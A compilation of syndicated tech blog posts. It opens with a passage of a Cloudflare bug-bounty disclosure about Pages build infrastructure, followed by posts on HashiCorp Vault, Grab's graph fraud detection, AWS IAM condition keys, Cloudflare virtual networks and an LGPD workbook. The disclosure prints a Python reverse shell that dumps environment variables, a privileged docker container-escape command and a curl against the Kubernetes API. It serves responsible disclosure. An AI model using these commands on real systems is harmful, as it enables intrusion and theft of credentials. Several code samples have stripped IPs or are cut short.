While building customer pages, a program called /opt/pages/bin/pages-metadata-generator is involved. This program had the Linux permissions of 777, allowing all users on the machine to read the program, execute the program, but most importantly overwrite the program. If you can overwrite the program prior to its invocation, the program might run with higher permissions when the next user comes along and wants to use it.

In this case the attack is simple. When a Pages build runs, the following build.sh is specified to run, and it can overwrite the executable with a new one.

cp pages-metadata-generator /opt/pages/bin/pages-metadata-generator

This allows the attacker to provide their own pages-metadata-generator program that is run with a populated set of environment variables. The proof of concept provided to Cloudflare was this minimal reverse shell.

echo "henlo fren"
export > /tmp/envvars
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x.x",9448));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

With a reverse shell, the attackers only need to run `env` to see a list of environment variables that the program was invoked with. We fixed the file permissions of the process, rotated the credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.

Bug 4: Bash path injection

This issue was very similar to Bug 3. The PATH environment variable contained a large set of directories for maximum compatibility with different developer tools.


Unfortunately not all of these directories were set to the proper filesystem permissions allowing a malicious version of the program bash to be written to them, and later invoked by the Pages build process. We patched this bug, rotated the impacted credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.

Bug 5: Azure pipelines escape

Back when this research was conducted we were running Cloudflare Pages on Azure Pipelines. Builds were taking place in highly privileged containers and the containers had the docker socket available to them. Once the researchers had root within these containers, escaping them was trivial after installing docker and mounting the root directory of the host machine.

sudo docker run -ti --privileged --net=host -v /:/host -v /dev:/dev -v /run:/run ubuntu:latest

Once they had root on the host machine, they were able to recover Azure DevOps credentials from the host which gave access to the Azure Organization that Cloudflare Pages was running within.

The credentials that were recovered gave access to highly audited APIs where we could validate that this issue was not previously exploited outside this security research.

Bug 6: Pages on Kubernetes

After receipt of the above bugs,  we decided to change the architecture  of Pages. One of these changes was migration of the product from Azure to Kubernetes, and simplifying the workflow, so the attack surface was smaller and defensive programming practices were easier to implement. After the change, Pages builds are within Kubernetes Pods and are seeded with the minimum set of credentials needed.

As part of this migration, we left off a very important iptables rule in our Kubernetes control plane, making it easy to curl the Kubernetes API and read secrets related to other Pods in the cluster (each Pod representing a separate Pages build).

curl -v -k [](

We quickly patched this issue with iptables rules to block network connections to the Kubernetes control plane. One of the secrets available to each Pod was the GitHub OAuth secret which would have allowed someone who exploited this issue to read the GitHub repositories of other Pages’ customers.

In the previously reported issues we had robust logs that showed us that the attacks that were being performed had never been performed by anyone else. The logs related to inspecting Pods were not available to us, so we decided to notify all Cloudflare Pages customers that had ever had a build run on our Kubernetes-based infrastructure. After patching the issue and investigating which customers were impacted, we emailed impacted customers on February 3 to tell them that it’s possible someone other than the researcher had exploited this issue, because our logs couldn’t prove otherwise.


We are thankful for all the security research performed on our Pages product, and done so at such an incredible depth. CI/CD and build infrastructure security problems are notoriously hard to prevent. A bug bounty that incentivizes researchers to keep coming back is invaluable, and we appreciate working with researchers who were flexible enough to perform great research, and work with us as we re-architected the product for more robustness. An in-depth write-up of these issues is available from the Assetnote team on their website.

More than this, however, the work of all these researchers is one of the best ways to test the security architecture of any product. While it might seem counter-intuitive after a post listing out a number of bugs, all these diligent eyes on our products allow us to feel much more confident in the security architecture of Cloudflare Pages. We hope that our transparency, and our description of the work done on our security posture, enables you to feel more confident, too.

Finally: if you are a security researcher, we’d love to work with you to make our products more secure. Check out hackerone.com/cloudflare for more info!

Secret Management with HashiCorp Vault

Post Syndicated from Mitz Amano original https://blog.cloudflare.com/secret-management-with-hashicorp-vault/

Secret Management with HashiCorp Vault

Secret Management with HashiCorp Vault

Many applications these days require authentication to external systems with resources, such as users and passwords to access databases and service accounts to access cloud services, and so on. In such cases, private information, like passwords and keys, becomes necessary. It is essential to take extra care in managing such sensitive data. For example, if you write your AWS key information or password in a script for deployment and then push it to a Git repository, all users who can read it will also be able to access it, and you could be in trouble. Even if it’s an internal repository, you run the risk of a potential leak.

How we were managing secrets in the service

Before we talk about Vault, let’s take a look at how we’ve used to manage secrets.


We use SaltStack as a bare-metal configuration management tool. The core of the Salt ecosystem consists of two major components: the Salt Master and the Salt Minion. The configuration state is owned by Salt Master, and thousands of Salt Minions automatically install packages, generate configuration files, and start services to the node based on the state. The state may contain secrets, such as passwords and API keys. When we deploy secrets to the node, we encrypt plaintext using a Salt Master owned GPG key and fill an ASCII-armored secret into the state file. Once it is applied, the Salt Master decrypts the PGP message using its own key, then the Salt Minion retrieves rendered data from the Master.

Secret Management with HashiCorp Vault


We were using Lockbox, a secure way to store your Kubernetes secrets offline. The secret is asymmetrically encrypted and can only be decrypted with the Lockbox Kubernetes controller. The controller synchronizes with Secret objects. A Secret generated from Lockbox will also be created in the corresponding namespace. Since namespaces have been assigned administrator privileges by each engineering team, ordinary users cannot read Secret objects.

Secret Management with HashiCorp Vault

Why these secrets management were insufficient

Prior to Vault, GnuPG and Lockbox were used in this way to encrypt and decrypt most secrets in the data center. Nevertheless, they were inadequate in certain cases:

  • Lack of scoping secrets: The secret data in ASCII-armor could only be decrypted by a specific node when the client read it. This was still not enough control. Salt owns a GPG key for each Salt Master, and Core services (k8s, Databases, Storage, Logging, Tracing, Monitoring, etc) are deployed to hundreds of Salt Minions by a few Salt Masters. Nodes are often reused as different services after repairing hardware failure, so we use the same GPG key to decrypt the secrets of various services. Therefore, having a GPG key for each service is complicated. Also, a specific secret is used only for a specific service. For example, an access key for object storage is needed to back up the repository. In previous configurations, the API key is decrypted by a common Salt Master, so there is a risk that the API key will be referenced by another service or for another purpose. It is impossible to scope secret access, as long as we use the same GPG key.

    Another case is Kubernetes. Namespace-scoped access control and API access restrictions by the RBAC model are excellent. And the etcd used by Kubernetes as storage is not encrypted by default, and the Secret object is also saved. We need to think about encryption-at-rest by a third party KMS, or how to prevent Secrets from being stored in etcd. In other words, it is also required to properly control access to the secret for the secret itself.

  • Rotation and static secret: Anyone who has access to the Salt Master GPG key can theoretically decrypt all current and future secrets. And as long as we have many secrets, it’s impossible to rotate the encryption of all the secrets. Current and future secret management requires a process for easy rotation and using dynamically generated secrets instead.
  • Session management: Users/Services with GPG keys can decrypt secrets at any time. So GPG secret decryption is like having no TTL. (You can set an expiration date against the GPG key, but it’s just metadata. If you try to encrypt a new secret, after the expiration date, you’ll get a warning, but you can decrypt the existing secret). A temporary session is required to limit access when not needed.
  • Audit: GPG doesn’t have a way to keep an audit trail. Audit trails help us to trace the event who/when/where read secrets. The audit trail should contain details including the date, time, and user information associated with the secret read (and login), which is required regardless of user or service.

HashiCorp Vault

Armed with our set of requirements, we chose HashiCorp Vault to make better secret management with a better security model.

  • Scoping secrets: When a client logs in, a Vault token is generated through the Auth method (backend). This token has a policy that defines access policies, so it is clear what the client can access the data after logging in.
  • Rotation and dynamic secret: Version-controlled static secret with KV V2 Secret Engine helps us to easily update/rollback secrets with a single request. In addition, dynamic secrets and credentials are available to eliminate manual rotation. Ideally, these are required to be short-lived and have frequent rotation. Service should have restricted access. These are essential to reduce the impact of an attack, but they are operationally difficult, and it is impossible to satisfy them without automation. Vault can solve this problem by allowing operators to provide dynamically generated credentials to their services. Vault manages the credential lifecycle and rotates and revokes it as needed.
  • Session management: Vault provides a login process to get the token and various auth methods are provided. It is possible to link with an Identity Provider and authenticate using JWT. Since the vault token has a TTL, it can be managed as a short-lived credential to access secrets.
  • Audit: Vault supports audit that records who accessed which Vault API, when, and from where.

We also built Vault clusters for HA, Reliability, and handling large numbers of requests.

  • Use Integrated Storage that every node in the Vault cluster has a duplicate copy of Vault’s data. A client can retrieve the same result from any node.
  • Performance Replication offers us the same result as any Vault clusters.
  • Requests from clients are routed from a single Service IP to one of the Clusters. Anycast routes incoming traffic to the nearest cluster that handles requests efficiently. If one cluster goes down, the request will be automatically routed to another available cluster.
Secret Management with HashiCorp Vault

Service integrations

Use the appropriate Auth backend and Secret Engine to integrate the Service and Vault that are responsible for each core component.


The configuration state is owned by Salt Master, and hundreds of Salt Minions automatically install packages, generate configuration files, and start services to the node based on the role. The state data may contain secrets, such as API keys, and Salt Minion retrieves them from Vault. Salt uses a JWT signed by the Salt Master to log in to the vault using the JWT Auth method.

Secret Management with HashiCorp Vault


Kubernetes reads Vault secrets through an operator that synchronizes with Secret objects. The Kubernetes Auth method uses the Service Account token JWT to login, just like the JWT Auth method. This JWT contains the service account name, UID, and namespace. Vault can scope namespace based on dynamic policy.

Secret Management with HashiCorp Vault

Identity Provider – User login

Additionally, Vault can work with the Identity Provider through a delegated authorization method based on OAuth 2.0 so that users can get tokens with the right policies. The JWT issued by the Identity Provider contains the group or user ID to which it belongs, and this metadata can be used to assign a Vault policy.

Secret Management with HashiCorp Vault

Integrated ecosystem – Auth x Secret

Vault provides a plugin system for two major components: authentication (Auth method) and secret management (Secret Engine). Vault can enable the officially provided plugins and the custom plugins you can build. The Auth method provides authentication for obtaining a Vault token by various methods. As mentioned in the service integration example above, we mainly use JWT, OIDC, and Kubernetes for login. On the other hand, the secret engine provides secrets in various ways, such as KV for a static secret, PKI for certificate signing, issuing, etc.

And they have an ecosystem. Vault can easily integrate auth methods and secret engines with each other. For instance, if we add a DB dynamic credential secret engine, all existing platforms will instantly be supported, without needing to reinvent the wheel, on how they will auth to a separate service. Similarly, we can add a platform into the mix, and it would instantly have access to all the existing secret engines and their functionalities. Additionally, the Vault can perform permission to the arbitrary endpoint path provided by secret engines based on the authentication method and policies.

Wrap up

Vault integration for the core component is already ongoing and many GPG secrets have been migrated to Vault. We aim to make service integrations in our data centers, dynamic credentials, and improve CI/CD for Vault. Interested? We’re hiring for security platform engineering!

Graph Networks – Striking fraud syndicates in the dark

Post Syndicated from Grab Tech original https://engineering.grab.com/graph-networks

As a leading superapp in Southeast Asia, Grab serves millions of consumers daily. This naturally makes us a target for fraudsters and to enhance our defences, the Integrity team at Grab has launched several hyper-scaled services, such as the Griffin real-time rule engine and Advanced Feature Engineering. These systems enable data scientists and risk analysts to develop real-time scoring, and take fraudsters out of our ecosystems.

Apart from individual fraudsters, we have also observed the fast evolution of the dark side over time. We have had to evolve our defences to deal with professional syndicates that use advanced equipment such as device farms and GPS spoofing apps to perform fraud at scale. These professional fraudsters are able to camouflage themselves as normal users, making it significantly harder to identify them with rule-based detection.

Since 2020, Grab’s Integrity team has been advancing fraud detection with more sophisticated techniques and experimenting with a range of graph network technologies such as graph visualisations, graph neural networks and graph analytics. We’ve seen a lot of progress in this journey and will be sharing some key learnings that might help other teams who are facing similar issues.

What are Graph-based Prediction Platforms?

“You can fool some of the people all of the time, and all of the people some of the time, but you cannot fool all of the people all of the time.” – Abraham Lincoln

A Graph-based Prediction Platform connects multiple entities through one or more common features. When such entities are viewed as a macro graph network, we uncover new patterns that are otherwise unseen to the naked eye. For example, when investigating if two users are sharing IP addresses or devices, we might not be able to tell if they are fraudulent or just family members sharing a device.

However, if we use a graph system and look at all users sharing this device or IP address, it could show us if these two users are part of a much larger syndicate network in a device farming operation. In operations like these, we may see up to hundreds of other fake accounts that were specifically created for promo and payment fraud. With graphs, we can identify fraudulent activity more easily.

Grab’s Graph-based Prediction Platform

Leveraging the power of graphs, the team has primarily built two types of systems:

  • Graph Database Platform: An ultra-scalable storage system with over one billion nodes that powers:
    1. Graph Visualisation: Risk specialists and data analysts can review user connections real-time and are able to quickly capture new fraud patterns with over 10 dimensions of features (see Fig 1).

      Change Data Capture flow
      Fig 1: Graph visualisation
    2. Network-based feature system: A configurable system for engineers to adjust machine learning features based on network connectivity, e.g. number of hops between two users, numbers of shared devices between two IP addresses.

  • Graph-based Machine Learning: Unlike traditional fraud detection models, Graph Neural Networks (GNN) are able to utilise the structural correlations on the graph and act as a sustainable foundation to combat many different kinds of fraud. The data science team has built large-scale GNN models for scenarios like anti-money laundering and fraud detection.

    Fig 2 shows a Money Laundering Network where hundreds of accounts coordinate the placement of funds, layering the illicit monies through a complex web of transactions making funds hard to trace, and consolidate funds into spending accounts.

Change Data Capture flow
Fig 2: Money Laundering Network

What’s next?

In the next article of our Graph Network blog series, we will dive deeper into how we develop the graph infrastructure and database using AWS Neptune. Stay tuned for the next part.

Join us

Grab is the leading superapp platform in Southeast Asia, providing everyday services that matter to consumers. More than just a ride-hailing and food delivery app, Grab offers a wide range of on-demand services in the region, including mobility, food, package and grocery delivery services, mobile payments, and financial services across 428 cities in eight countries.

Powered by technology and driven by heart, our mission is to drive Southeast Asia forward by creating economic empowerment for everyone. If this mission speaks to you, join our team today!

How to control access to AWS resources based on AWS account, OU, or organization

Post Syndicated from Rishi Mehrotra original https://aws.amazon.com/blogs/security/how-to-control-access-to-aws-resources-based-on-aws-account-ou-or-organization/

AWS Identity and Access Management (IAM) recently launched new condition keys to make it simpler to control access to your resources along your Amazon Web Services (AWS) organizational boundaries. AWS recommends that you set up multiple accounts as your workloads grow, and you can use multiple AWS accounts to isolate workloads or applications that have specific security requirements. By using the new conditions, aws:ResourceOrgID, aws:ResourceOrgPaths, and aws:ResourceAccount, you can define access controls based on an AWS resource’s organization, organizational unit (OU), or account. These conditions make it simpler to require that your principals (users and roles) can only access resources inside a specific boundary within your organization. You can combine the new conditions with other IAM capabilities to restrict access to and from AWS accounts that are not part of your organization.

This post will help you get started using the new condition keys. We’ll show the details of the new condition keys and walk through a detailed example based on the following scenario. We’ll also provide references and links to help you learn more about how to establish access control perimeters around your AWS accounts.

Consider a common scenario where you would like to prevent principals in your AWS organization from adding objects to Amazon Simple Storage Service (Amazon S3) buckets that don’t belong to your organization. To accomplish this, you can configure an IAM policy to deny access to S3 actions unless aws:ResourceOrgID matches your unique AWS organization ID. Because the policy references your entire organization, rather than individual S3 resources, you have a convenient way to maintain this security posture across any number of resources you control. The new conditions give you the tools to create a security baseline for your IAM principals and help you prevent unintended access to resources in accounts that you don’t control. You can attach this policy to an IAM principal to apply this rule to a single user or role, or use service control policies (SCPs) in AWS Organizations to apply the rule broadly across your AWS accounts. IAM principals that are subject to this policy will only be able to perform S3 actions on buckets and objects within your organization, regardless of their other permissions granted through IAM policies or S3 bucket policies.

New condition key details

You can use the aws:ResourceOrgID, aws:ResourceOrgPaths, and aws:ResourceAccount condition keys in IAM policies to place controls on the resources that your principals can access. The following table explains the new condition keys and what values these keys can take.

Condition key Description Operator Single/multi value Value
aws:ResourceOrgID AWS organization ID of the resource being accessed All string operators Single value key Any AWS organization ID
aws:ResourceOrgPaths Organization path of the resource being accessed All string operators Multi-value key Organization paths of AWS organization IDs and organizational unit IDs
aws:ResourceAccount AWS account ID of the resource being accessed All string operators Single value key Any AWS account ID

Note: Of the three keys, only aws:ResourceOrgPaths is a multi-value condition key, while aws:ResourceAccount and aws:ResourceOrgID are single-value keys. For information on how to use multi-value keys, see Creating a condition with multiple keys or values in the IAM documentation.

Resource owner keys compared to principal owner keys

The new IAM condition keys complement the existing principal condition keys aws:PrincipalAccount, aws:PrincipalOrgPaths, and aws:PrincipalOrgID. The principal condition keys help you define which AWS accounts, organizational units (OUs), and organizations are allowed to access your resources. For more information on the principal conditions, see Use IAM to share your AWS resources with groups of AWS accounts in AWS Organizations on the AWS Security Blog.

Using the principal and resource keys together helps you establish permission guardrails around your AWS principals and resources, and makes it simpler to keep your data inside the organization boundaries you define as you continue to scale. For example, you can define identity-based policies that prevent your IAM principals from accessing resources outside your organization (by using the aws:ResourceOrgID condition). Next, you can define resource-based policies that prevent IAM principals outside your organization from accessing resources that are inside your organization boundary (by using the aws:PrincipalOrgID condition). The combination of both policies prevents any access to and from AWS accounts that are not part of your organization. In the next sections, we’ll walk through an example of how to configure the identity-based policy in your organization. For the resource-based policy, you can follow along with the example in An easier way to control access to AWS resources by using the AWS organization of IAM principals on the AWS Security blog.

Setup for the examples

In the following sections, we’ll show an example IAM policy for each of the new conditions. To follow along with Example 1, which uses aws:ResourceAccount, you’ll just need an AWS account.

To follow along with Examples 2 and 3 that use aws:ResourceOrgPaths and aws:ResourceOrgID respectively, you’ll need to have an organization in AWS Organizations and at least one OU created. This blog post assumes that you have some familiarity with the basic concepts in IAM and AWS Organizations. If you need help creating an organization or want to learn more about AWS Organizations, visit Getting Started with AWS Organizations in the AWS documentation.

Which IAM policy type should I use?

You can implement the following examples as identity-based policies, or in SCPs that are managed in AWS Organizations. If you want to establish a boundary for some of your IAM principals, we recommend that you use identity-based policies. If you want to establish a boundary for an entire AWS account or for your organization, we recommend that you use SCPs. Because SCPs apply to an entire AWS account, you should take care when you apply the following policies to your organization, and account for any exceptions to these rules that might be necessary for some AWS services to function properly.

Example 1: Restrict access to AWS resources within a specific AWS account

Let’s look at an example IAM policy that restricts access along the boundary of a single AWS account. For this example, say that you have an IAM principal in account 222222222222, and you want to prevent the principal from accessing S3 objects outside of this account. To create this effect, you could attach the following IAM policy.

  "Version": "2012-10-17",
  "Statement": [
      "Sid": " DenyS3AccessOutsideMyBoundary",
      "Effect": "Deny",
      "Action": [
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:ResourceAccount": [

Note: This policy is not meant to replace your existing IAM access controls, because it does not grant any access. Instead, this policy can act as an additional guardrail for your other IAM permissions. You can use a policy like this to prevent your principals from access to any AWS accounts that you don’t know or control, regardless of the permissions granted through other IAM policies.

This policy uses a Deny effect to block access to S3 actions unless the S3 resource being accessed is in account 222222222222. This policy prevents S3 access to accounts outside of the boundary of a single AWS account. You can use a policy like this one to limit your IAM principals to access only the resources that are inside your trusted AWS accounts. To implement a policy like this example yourself, replace account ID 222222222222 in the policy with your own AWS account ID. For a policy you can apply to multiple accounts while still maintaining this restriction, you could alternatively replace the account ID with the aws:PrincipalAccount condition key, to require that the principal and resource must be in the same account (see example #3 in this post for more details how to accomplish this).

Organization setup: Welcome to AnyCompany

For the next two examples, we’ll use an example organization called AnyCompany that we created in AWS Organizations. You can create a similar organization to follow along directly with these examples, or adapt the sample policies to fit your own organization. Figure 1 shows the organization structure for AnyCompany.

Figure 1: Organization structure for AnyCompany

Figure 1: Organization structure for AnyCompany

Like all organizations, AnyCompany has an organization root. Under the root are three OUs: Media, Sports, and Governance. Under the Sports OU, there are three more OUs: Baseball, Basketball, and Football. AWS accounts in this organization are spread across all the OUs based on their business purpose. In total, there are six OUs in this organization.

Example 2: Restrict access to AWS resources within my organizational unit

Now that you’ve seen what the AnyCompany organization looks like, let’s walk through another example IAM policy that you can use to restrict access to a specific part of your organization. For this example, let’s say you want to restrict S3 object access within the following OUs in the AnyCompany organization:

  • Media
  • Sports
  • Baseball
  • Basketball
  • Football

To define a boundary around these OUs, you don’t need to list all of them in your IAM policy. Instead, you can use the organization structure to your advantage. The Baseball, Basketball, and Football OUs share a parent, the Sports OU. You can use the new aws:ResourceOrgPaths key to prevent access outside of the Media OU, the Sports OU, and any OUs under it. Here’s the IAM policy that achieves this effect.

  "Version": "2012-10-17",
  "Statement": [
      "Sid": " DenyS3AccessOutsideMyBoundary",
      "Effect": "Deny",
      "Action": [
      "Resource": "*",
      "Condition": {
        "ForAllValues:StringNotLike": {
          "aws:ResourceOrgPaths": [

Note: Like the earlier example, this policy does not grant any access. Instead, this policy provides a backstop for your other IAM permissions, preventing your principals from accessing S3 objects outside an OU-defined boundary. If you want to require that your IAM principals consistently follow this rule, we recommend that you apply this policy as an SCP. In this example, we attached this policy to the root of our organization, applying it to all principals across all accounts in the AnyCompany organization.

The policy denies access to S3 actions unless the S3 resource being accessed is in a specific set of OUs in the AnyCompany organization. This policy is identical to Example 1, except for the condition block: The condition requires that aws:ResourceOrgPaths contains any of the listed OU paths. Because aws:ResourceOrgPaths is a multi-value condition, the policy uses the ForAllValues:StringNotLike operator to compare the values of aws:ResourceOrgPaths to the list of OUs in the policy.

The first OU path in the list is for the Media OU. The second OU path is the Sports OU, but it also adds the wildcard character * to the end of the path. The wildcard * matches any combination of characters, and so this condition matches both the Sports OU and any other OU further down its path. Using wildcards in the OU path allows you to implicitly reference other OUs inside the Sports OU, without having to list them explicitly in the policy. For more information about wildcards, refer to Using wildcards in resource ARNs in the IAM documentation.

Example 3: Restrict access to AWS resources within my organization

Finally, we’ll look at a very simple example of a boundary that is defined at the level of an entire organization. This is the same use case as the preceding two examples (restrict access to S3 object access), but scoped to an organization instead of an account or collection of OUs.

  "Version": "2012-10-17",
  "Statement": [
      "Sid": "DenyS3AccessOutsideMyBoundary",
      "Effect": "Deny",
      "Action": [
      "Resource": "arn:aws:s3:::*/*",
      "Condition": {
        "StringNotEquals": {
          "aws:ResourceOrgID": "${aws:PrincipalOrgID}"

Note: Like the earlier examples, this policy does not grant any access. Instead, this policy provides a backstop for your other IAM permissions, preventing your principals from accessing S3 objects outside your organization regardless of their other access permissions. If you want to require that your IAM principals consistently follow this rule, we recommend that you apply this policy as an SCP. As in the previous example, we attached this policy to the root of our organization, applying it to all accounts in the AnyCompany organization.

The policy denies access to S3 actions unless the S3 resource being accessed is in the same organization as the IAM principal that is accessing it. This policy is identical to Example 1, except for the condition block: The condition requires that aws:ResourceOrgID and aws:PrincipalOrgID must be equal to each other. With this requirement, the principal making the request and the resource being accessed must be in the same organization. This policy also applies to S3 resources that are created after the policy is put into effect, so it is simple to maintain the same security posture across all your resources.

For more information about aws:PrincipalOrgID, refer to AWS global condition context keys in the IAM documentation.

Learn more

In this post, we explored the new conditions, and walked through a few examples to show you how to restrict access to S3 objects across the boundary of an account, OU, or organization. These tools work for more than just S3, though: You can use the new conditions to help you protect a wide variety of AWS services and actions. Here are a few links that you may want to look at:

If you have any questions, comments, or concerns, contact AWS Support or start a new thread on the AWS Identity and Access Management forum. Thanks for reading about this new feature. If you have feedback about this post, submit comments in the Comments section below.

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Rishi Mehrotra

Rishi Mehrotra

Rishi is a Product Manager in AWS IAM. He enjoys working with customers and influencing products decisions. Prior to Amazon, Rishi worked for enterprise IT customers after receiving engineering degree in computer science. He recently pursued MBA from The University of Chicago Booth School of Business. Outside of work, Rishi enjoys biking, reading, and playing with his kids.


Michael Switzer

Mike is the product manager for the Identity and Access Management service at AWS. He enjoys working directly with customers to identify solutions to their challenges, and using data-driven decision making to drive his work. Outside of work, Mike is an avid cyclist and outdoorsperson. He holds a master’s degree in computational mathematics from the University of Washington.

Building many private virtual networks through Cloudflare Zero Trust

Post Syndicated from Nuno Diegues original https://blog.cloudflare.com/building-many-private-virtual-networks-through-cloudflare-zero-trust/

Building many private virtual networks through Cloudflare Zero Trust

We built Cloudflare’s Zero Trust platform to help companies rely on our network to connect their private networks securely, while improving performance and reducing operational burden. With it, you could build a single virtual private network, where all your connected private networks had to be uniquely identifiable.

Starting today, we are thrilled to announce that you can start building many segregated virtual private networks over Cloudflare Zero Trust, beginning with virtualized connectivity for the connectors Cloudflare WARP and Cloudflare Tunnel.

Connecting your private networks through Cloudflare

Consider your team, with various services hosted across distinct private networks, and employees accessing those resources. More than ever, those employees may be roaming, remote, or actually in a company office. Regardless, you need to ensure only they can access your private services. Even then, you want to have granular control over what each user can access within your network.

This is where Cloudflare can help you. We make our global, performant network available to you, acting as a virtual bridge between your employees and private services. With your employees’ devices running Cloudflare WARP, their traffic egresses through Cloudflare’s network. On the other side, your private services are behind Cloudflare Tunnel, accessible only through Cloudflare’s network. Together, these connectors protect your virtual private network end to end.

Building many private virtual networks through Cloudflare Zero Trust

The beauty of this setup is that your traffic is immediately faster and more secure. But you can then take it a step further and extract value from many Cloudflare services for your private network routed traffic: auditing, fine-grained filtering, data loss protection, malware detection, safe browsing, and many others.

Our customers are already in love with our Zero Trust private network routing solution. However, like all things we love, they can still improve.

The problem of overlapping networks

In the image above, the user can access any private service as if they were physically located within the network of that private service. For example, this means typing jira.intra in the browser or SSH-ing to a private IP will work seamlessly despite neither of those private services being exposed to the Internet.

However, this has a big assumption in place: those underlying private IPs are assumed to be unique in the private networks connected to Cloudflare in the customer’s account.

Suppose now that your Team has two (or more) data centers that use the same IP space — usually referred to as a CIDR — such as Maybe one is the current primary and the other is the secondary, replicating one another. In such an example situation, there would exist a machine in each of those two data centers, both with the same IP,

Until today, you could not set up that via Cloudflare. You would connect data center 1 with a Cloudflare Tunnel responsible for traffic to You would then do the same in data center 2, but receive an error forbidding you to create an ambiguous IP route:

$ cloudflared tunnel route ip add dc-2-tunnel

API error: Failed to add route: code: 1014, reason: You already have a route defined for this exact IP subnet

In an ideal world, a team would not have this problem: every private network would have unique IP space. But that is just not feasible in practice, particularly for large enterprises. Consider the case where two companies merge: it is borderline impossible to expect them to rearrange their private networks to preserve IP addressing uniqueness.

Getting started on your new virtual networks

You can now overcome the problem above by creating unique virtual networks that logically segregate your overlapping IP routes. You can think of a virtual network as a group of IP subspaces. This effectively allows you to compose your overall infrastructure into independent (virtualized) private networks that are reachable by your Cloudflare Zero Trust organization through Cloudflare WARP.

Building many private virtual networks through Cloudflare Zero Trust

Let us set up this scenario.

We start by creating two virtual networks, with one being the default:

$ cloudflared tunnel vnet add —-default vnet-frankfurt "For London and Munich employees primarily"

Successfully added virtual network vnet-frankfurt with ID: 8a6ea860-cd41-45eb-b057-bb6e88a71692 (as the new default for this account)

$ cloudflared tunnel vnet add vnet-sydney "For APAC employees primarily"

Successfully added virtual network vnet-sydney with ID: e436a40f-46c4-496e-80a2-b8c9401feac7

We can then create the Tunnels and route the CIDRs to them:

$ cloudflared tunnel create tunnel-fra

Created tunnel tunnel-fra with id 79c5ba59-ce90-4e91-8c16-047e07751b42

$ cloudflared tunnel create tunnel-syd

Created tunnel tunnel-syd with id 150ef29f-2fb0-43f8-b56f-de0baa7ab9d8

$ cloudflared tunnel route ip add --vnet vnet-frankfurt tunnel-fra

Successfully added route for over tunnel 79c5ba59-ce90-4e91-8c16-047e07751b42

$ cloudflared tunnel route ip add --vnet vnet-sydney tunnel-syd

Successfully added route for over tunnel 150ef29f-2fb0-43f8-b56f-de0baa7ab9d8

And that’s it! Both your Tunnels can now be run and they will connect your private data centers to Cloudflare despite having overlapping IPs.

Your users will now be routed through the virtual network vnet-frankfurt by default. Should any user want otherwise, they could choose on the WARP client interface settings, for example, to be routed via vnet-sydney.

Building many private virtual networks through Cloudflare Zero Trust

When the user changes the virtual network chosen, that informs Cloudflare’s network of the routing decision. This will propagate that knowledge to all our data centers via Quicksilver in a matter of seconds. The WARP client then restarts its connectivity to our network, breaking existing TCP connections that were being routed to the previously selected virtual network. This may be perceived as if you were disconnecting and reconnecting the WARP client.

Every current Cloudflare Zero Trust organization using private network routing will now have a default virtual network encompassing the IP Routes to Cloudflare Tunnels. You can start using the commands above to expand your private network to have overlapping IPs and reassign a default virtual network if desired.

If you do not have overlapping IPs in your private infrastructure, no action will be required.

What’s next

This is just the beginning of our support for distinct virtual networks at Cloudflare. As you may have seen, last week we announced the ability to create, deploy, and manage Cloudflare Tunnels directly from the Zero Trust dashboard. Today, virtual networks are only supported through the cloudflared CLI, but we are looking to integrate virtual network management into the dashboard as well.

Our next step will be to make Cloudflare Gateway aware of these virtual networks so that Zero Trust policies can be applied to these overlapping IP ranges. Once Gateway is aware of these virtual networks, we will also surface this concept with Network Logging for auditability and troubleshooting moving forward.

LGPD workbook for AWS customers managing personally identifiable information in Brazil

Post Syndicated from Rodrigo Fiuza original https://aws.amazon.com/blogs/security/lgpd-workbook-for-aws-customers-managing-personally-identifiable-information-in-brazil/

Portuguese version

AWS is pleased to announce the publication of the Brazil General Data Protection Law Workbook.

The General Data Protection Law (LGPD) in Brazil was first published on 14 August 2018, and started its applicability on 18 August 2020. Companies that manage personally identifiable information (PII) in Brazil as defined by LGPD will have to comply with and attend to the law.

To better help customers prepare and implement controls that focus on LGPD Chapter VII Security and Best Practices, AWS created a workbook based on industry best practices, AWS service offerings, and controls.

Amongst other topics, this workbook covers information security and AWS controls from:

In combination with Brazil General Data Protection Law Workbook, customers can use the detailed Navigating LGPD Compliance on AWS whitepaper.

AWS adheres to a shared responsibility model. Customers will have to observe which services offer privacy features and determine their applicability to their specific compliance requirements. Further information about data privacy at AWS can be found at our Data Privacy Center. Specific information about LGPD and data privacy at AWS in Brazil can be found on our Brazil Data Privacy page.

To learn more about our compliance and security programs, see AWS Compliance Programs. As always, we value your feedback and questions; reach out to the AWS Compliance team through the Contact Us page.

If you have feedback about this post, submit comments in the Comments section below.
Want more AWS Security news? Follow us on Twitter.


Workbook da LGPD para Clientes AWS que gerenciam Informações de Identificação Pessoal no Brasil

A AWS tem o prazer de anunciar a publicação do Workbook Lei Geral de Proteção de Dados do Brasil.

A Lei Geral de Proteção de Dados (LGPD) teve sua primeira publicação em 14 de agosto de 2018 no Brasil e iniciou sua aplicabilidade em 18 de agosto de 2020. Empresas que gerenciam informações pessoais identificáveis (PII) conforme definido na LGPD terão que cumprir e atender às cláusulas da lei.

Para ajudar melhor os clientes a preparar e implementar controles que se concentram no Capítulo VII da LGPD “da Segurança e Boas Práticas”, a AWS criou uma pasta de trabalho com base nas melhores práticas do setor, ofertas de serviços e controles da AWS.

Entre outros tópicos, esta pasta de trabalho aborda a segurança da informação e os controles da AWS de:

Em combinação com o Workbook Lei Geral de Proteção de Dados do Brasil, os clientes podem usar o whitepaper detalhado Navegando na conformidade com a LGPD na AWS.

A AWS adere a um modelo de responsabilidade compartilhada. Clientes terão que observar quais serviços oferecem recursos de privacidade e determinar sua aplicabilidade aos seus requisitos específicos de compliance. Mais informações sobre a privacidade de dados na AWS podem ser encontradas em nosso Centro de Privacidade de Dados. Informações adicionais sobre LGPD e Privacidade de dados na AWS no Brasil podem ser encontradas em nossa página de Privacidade de Dados no Brasil.

Para saber mais sobre nossos programas de conformidade e segurança, consulte Programas de conformidade da AWS. Como sempre, valorizamos seus comentários e perguntas; entre em contato com a equipe de conformidade da AWS por meio da página Fale conosco.

